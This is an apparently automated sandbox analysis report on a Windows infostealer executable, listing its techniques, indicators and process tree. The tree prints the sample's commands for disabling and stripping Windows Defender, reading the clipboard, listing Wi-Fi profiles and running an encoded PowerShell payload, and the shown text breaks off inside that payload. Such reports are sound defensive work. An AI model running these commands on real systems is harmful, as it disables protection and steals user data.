fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29

Analysis

max time kernel
92s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
Size

6.9MB
MD5

03bb5937fb7b74837da488b2278d0811
SHA1

51259fa1bf7608d3c394c2f7776f581d5251aa01
SHA256

fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
SHA512

8f9a20db244661771745d353ae3669c8fa7be60ab3a68e4075de0500513b591b30ecf44e340fddcf92a09814fa4e796329dc6a49f4b309f0979c8fe73ed2e097
SSDEEP

196608:OQV1vLB6ylnlPzf+JiJCsmFMvQn6hqgdhY:TLBRlnlPSa7mmvQpgdhY

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
876	powershell.exe
2884	powershell.exe
1556	powershell.exe
2180	powershell.exe
3192	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4224	powershell.exe
1868	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2320	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
21	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3108	tasklist.exe
3412	tasklist.exe
532	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023bb7-21.dat	upx
behavioral2/memory/1640-25-0x00007FF82C330000-0x00007FF82C91A000-memory.dmp	upx
behavioral2/files/0x000a000000023b9c-48.dat	upx
behavioral2/files/0x000a000000023b9b-47.dat	upx
behavioral2/files/0x000a000000023b9a-46.dat	upx
behavioral2/files/0x000a000000023b99-45.dat	upx
behavioral2/files/0x000a000000023b98-44.dat	upx
behavioral2/files/0x000a000000023b97-43.dat	upx
behavioral2/files/0x000a000000023b96-42.dat	upx
behavioral2/files/0x000a000000023b94-41.dat	upx
behavioral2/files/0x0008000000023bc4-40.dat	upx
behavioral2/files/0x000e000000023bc2-39.dat	upx
behavioral2/memory/1640-54-0x00007FF83E940000-0x00007FF83E96D000-memory.dmp	upx
behavioral2/memory/1640-60-0x00007FF83AFE0000-0x00007FF83B14F000-memory.dmp	upx
behavioral2/memory/1640-64-0x00007FF841660000-0x00007FF84166D000-memory.dmp	upx
behavioral2/files/0x000e000000023bae-67.dat	upx
behavioral2/memory/1640-66-0x00007FF83E8E0000-0x00007FF83E90E000-memory.dmp	upx
behavioral2/memory/1640-74-0x00007FF83B670000-0x00007FF83B693000-memory.dmp	upx
behavioral2/memory/1640-76-0x00007FF840550000-0x00007FF840564000-memory.dmp	upx
behavioral2/memory/1640-83-0x00007FF8431A0000-0x00007FF8431B9000-memory.dmp	upx
behavioral2/memory/1640-84-0x00007FF82BF60000-0x00007FF82C07C000-memory.dmp	upx
behavioral2/memory/1640-113-0x00007FF83E910000-0x00007FF83E933000-memory.dmp	upx
behavioral2/memory/1640-201-0x00007FF83AFE0000-0x00007FF83B14F000-memory.dmp	upx
behavioral2/memory/1640-261-0x00007FF841750000-0x00007FF841769000-memory.dmp	upx
behavioral2/memory/1640-281-0x00007FF83E8E0000-0x00007FF83E90E000-memory.dmp	upx
behavioral2/memory/1640-300-0x00007FF83B5B0000-0x00007FF83B668000-memory.dmp	upx
behavioral2/memory/1640-79-0x00007FF841650000-0x00007FF84165D000-memory.dmp	upx
behavioral2/memory/1640-78-0x00007FF83E940000-0x00007FF83E96D000-memory.dmp	upx
behavioral2/memory/1640-73-0x00007FF83A930000-0x00007FF83ACA5000-memory.dmp	upx
behavioral2/memory/1640-302-0x00007FF83A930000-0x00007FF83ACA5000-memory.dmp	upx
behavioral2/memory/1640-71-0x00007FF83B5B0000-0x00007FF83B668000-memory.dmp	upx
behavioral2/files/0x000b000000023b9f-68.dat	upx
behavioral2/memory/1640-70-0x00007FF82C330000-0x00007FF82C91A000-memory.dmp	upx
behavioral2/files/0x0009000000023bbe-63.dat	upx
behavioral2/memory/1640-62-0x00007FF841750000-0x00007FF841769000-memory.dmp	upx
behavioral2/memory/1640-58-0x00007FF83E910000-0x00007FF83E933000-memory.dmp	upx
behavioral2/memory/1640-56-0x00007FF8431A0000-0x00007FF8431B9000-memory.dmp	upx
behavioral2/memory/1640-32-0x00007FF844C90000-0x00007FF844C9F000-memory.dmp	upx
behavioral2/files/0x000a000000023ba7-31.dat	upx
behavioral2/memory/1640-303-0x00007FF840550000-0x00007FF840564000-memory.dmp	upx
behavioral2/memory/1640-29-0x00007FF83B670000-0x00007FF83B693000-memory.dmp	upx
behavioral2/files/0x000a000000023b95-28.dat	upx
behavioral2/memory/1640-318-0x00007FF82BF60000-0x00007FF82C07C000-memory.dmp	upx
behavioral2/memory/1640-304-0x00007FF82C330000-0x00007FF82C91A000-memory.dmp	upx
behavioral2/memory/1640-310-0x00007FF83AFE0000-0x00007FF83B14F000-memory.dmp	upx
behavioral2/memory/1640-305-0x00007FF83B670000-0x00007FF83B693000-memory.dmp	upx
behavioral2/memory/1640-319-0x00007FF82C330000-0x00007FF82C91A000-memory.dmp	upx
behavioral2/memory/1640-347-0x00007FF82BF60000-0x00007FF82C07C000-memory.dmp	upx
behavioral2/memory/1640-346-0x00007FF841650000-0x00007FF84165D000-memory.dmp	upx
behavioral2/memory/1640-345-0x00007FF840550000-0x00007FF840564000-memory.dmp	upx
behavioral2/memory/1640-344-0x00007FF83B5B0000-0x00007FF83B668000-memory.dmp	upx
behavioral2/memory/1640-343-0x00007FF83E8E0000-0x00007FF83E90E000-memory.dmp	upx
behavioral2/memory/1640-342-0x00007FF841660000-0x00007FF84166D000-memory.dmp	upx
behavioral2/memory/1640-341-0x00007FF841750000-0x00007FF841769000-memory.dmp	upx
behavioral2/memory/1640-340-0x00007FF83AFE0000-0x00007FF83B14F000-memory.dmp	upx
behavioral2/memory/1640-339-0x00007FF83E910000-0x00007FF83E933000-memory.dmp	upx
behavioral2/memory/1640-338-0x00007FF8431A0000-0x00007FF8431B9000-memory.dmp	upx
behavioral2/memory/1640-337-0x00007FF83E940000-0x00007FF83E96D000-memory.dmp	upx
behavioral2/memory/1640-336-0x00007FF844C90000-0x00007FF844C9F000-memory.dmp	upx
behavioral2/memory/1640-335-0x00007FF83B670000-0x00007FF83B693000-memory.dmp	upx
behavioral2/memory/1640-334-0x00007FF83A930000-0x00007FF83ACA5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3448	netsh.exe
3648	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4196	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3124	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2884	powershell.exe
876	powershell.exe
1556	powershell.exe
876	powershell.exe
2884	powershell.exe
1556	powershell.exe
4224	powershell.exe
4224	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
4224	powershell.exe
2180	powershell.exe
2180	powershell.exe
4620	powershell.exe
4620	powershell.exe
3192	powershell.exe
3192	powershell.exe
1900	powershell.exe
1900	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	3108	tasklist.exe
Token: SeDebugPrivilege	532	tasklist.exe
Token: SeIncreaseQuotaPrivilege	428	WMIC.exe
Token: SeSecurityPrivilege	428	WMIC.exe
Token: SeTakeOwnershipPrivilege	428	WMIC.exe
Token: SeLoadDriverPrivilege	428	WMIC.exe
Token: SeSystemProfilePrivilege	428	WMIC.exe
Token: SeSystemtimePrivilege	428	WMIC.exe
Token: SeProfSingleProcessPrivilege	428	WMIC.exe
Token: SeIncBasePriorityPrivilege	428	WMIC.exe
Token: SeCreatePagefilePrivilege	428	WMIC.exe
Token: SeBackupPrivilege	428	WMIC.exe
Token: SeRestorePrivilege	428	WMIC.exe
Token: SeShutdownPrivilege	428	WMIC.exe
Token: SeDebugPrivilege	428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	428	WMIC.exe
Token: SeRemoteShutdownPrivilege	428	WMIC.exe
Token: SeUndockPrivilege	428	WMIC.exe
Token: SeManageVolumePrivilege	428	WMIC.exe
Token: 33	428	WMIC.exe
Token: 34	428	WMIC.exe
Token: 35	428	WMIC.exe
Token: 36	428	WMIC.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	3412	tasklist.exe
Token: SeIncreaseQuotaPrivilege	428	WMIC.exe
Token: SeSecurityPrivilege	428	WMIC.exe
Token: SeTakeOwnershipPrivilege	428	WMIC.exe
Token: SeLoadDriverPrivilege	428	WMIC.exe
Token: SeSystemProfilePrivilege	428	WMIC.exe
Token: SeSystemtimePrivilege	428	WMIC.exe
Token: SeProfSingleProcessPrivilege	428	WMIC.exe
Token: SeIncBasePriorityPrivilege	428	WMIC.exe
Token: SeCreatePagefilePrivilege	428	WMIC.exe
Token: SeBackupPrivilege	428	WMIC.exe
Token: SeRestorePrivilege	428	WMIC.exe
Token: SeShutdownPrivilege	428	WMIC.exe
Token: SeDebugPrivilege	428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	428	WMIC.exe
Token: SeRemoteShutdownPrivilege	428	WMIC.exe
Token: SeUndockPrivilege	428	WMIC.exe
Token: SeManageVolumePrivilege	428	WMIC.exe
Token: 33	428	WMIC.exe
Token: 34	428	WMIC.exe
Token: 35	428	WMIC.exe
Token: 36	428	WMIC.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeIncreaseQuotaPrivilege	776	WMIC.exe
Token: SeSecurityPrivilege	776	WMIC.exe
Token: SeTakeOwnershipPrivilege	776	WMIC.exe
Token: SeLoadDriverPrivilege	776	WMIC.exe
Token: SeSystemProfilePrivilege	776	WMIC.exe
Token: SeSystemtimePrivilege	776	WMIC.exe
Token: SeProfSingleProcessPrivilege	776	WMIC.exe
Token: SeIncBasePriorityPrivilege	776	WMIC.exe
Token: SeCreatePagefilePrivilege	776	WMIC.exe
Token: SeBackupPrivilege	776	WMIC.exe
Token: SeRestorePrivilege	776	WMIC.exe
Token: SeShutdownPrivilege	776	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1644 wrote to memory of 1640	1644	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	82
PID 1644 wrote to memory of 1640	1644	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	82
PID 1640 wrote to memory of 4628	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	83
PID 1640 wrote to memory of 4628	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	83
PID 1640 wrote to memory of 3600	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	84
PID 1640 wrote to memory of 3600	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	84
PID 1640 wrote to memory of 3428	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	87
PID 1640 wrote to memory of 3428	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	87
PID 3428 wrote to memory of 876	3428	cmd.exe	90
PID 4628 wrote to memory of 2884	4628	cmd.exe	89
PID 4628 wrote to memory of 2884	4628	cmd.exe	89
PID 3428 wrote to memory of 876	3428	cmd.exe	90
PID 3600 wrote to memory of 1556	3600	cmd.exe	159
PID 3600 wrote to memory of 1556	3600	cmd.exe	159
PID 1640 wrote to memory of 4228	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	92
PID 1640 wrote to memory of 4228	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	92
PID 1640 wrote to memory of 2876	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	94
PID 1640 wrote to memory of 2876	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	94
PID 2876 wrote to memory of 532	2876	cmd.exe	96
PID 2876 wrote to memory of 532	2876	cmd.exe	96
PID 4228 wrote to memory of 3108	4228	cmd.exe	163
PID 4228 wrote to memory of 3108	4228	cmd.exe	163
PID 1640 wrote to memory of 1896	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	98
PID 1640 wrote to memory of 1896	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	98
PID 1640 wrote to memory of 1868	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	100
PID 1640 wrote to memory of 1868	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	100
PID 1640 wrote to memory of 1724	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	101
PID 1640 wrote to memory of 1724	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	101
PID 1640 wrote to memory of 2688	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	104
PID 1640 wrote to memory of 2688	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	104
PID 1640 wrote to memory of 3648	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	107
PID 1640 wrote to memory of 3648	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	107
PID 1640 wrote to memory of 3656	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	108
PID 1640 wrote to memory of 3656	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	108
PID 1640 wrote to memory of 980	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	111
PID 1640 wrote to memory of 980	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	111
PID 1896 wrote to memory of 428	1896	cmd.exe	112
PID 1896 wrote to memory of 428	1896	cmd.exe	112
PID 1868 wrote to memory of 4224	1868	cmd.exe	114
PID 1868 wrote to memory of 4224	1868	cmd.exe	114
PID 1724 wrote to memory of 3412	1724	cmd.exe	115
PID 1724 wrote to memory of 3412	1724	cmd.exe	115
PID 3656 wrote to memory of 3124	3656	cmd.exe	116
PID 3656 wrote to memory of 3124	3656	cmd.exe	116
PID 3648 wrote to memory of 3448	3648	cmd.exe	117
PID 3648 wrote to memory of 3448	3648	cmd.exe	117
PID 2688 wrote to memory of 2296	2688	cmd.exe	137
PID 2688 wrote to memory of 2296	2688	cmd.exe	137
PID 980 wrote to memory of 4308	980	cmd.exe	119
PID 980 wrote to memory of 4308	980	cmd.exe	119
PID 1640 wrote to memory of 5032	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	120
PID 1640 wrote to memory of 5032	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	120
PID 5032 wrote to memory of 2540	5032	cmd.exe	122
PID 5032 wrote to memory of 2540	5032	cmd.exe	122
PID 1640 wrote to memory of 452	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	123
PID 1640 wrote to memory of 452	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	123
PID 452 wrote to memory of 4844	452	cmd.exe	125
PID 452 wrote to memory of 4844	452	cmd.exe	125
PID 1640 wrote to memory of 3768	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	127
PID 1640 wrote to memory of 3768	1640	fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe	127
PID 4308 wrote to memory of 3632	4308	powershell.exe	126
PID 4308 wrote to memory of 3632	4308	powershell.exe	126
PID 3768 wrote to memory of 3368	3768	cmd.exe	129
PID 3768 wrote to memory of 3368	3768	cmd.exe	129

C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
"C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
  "C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2180
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAg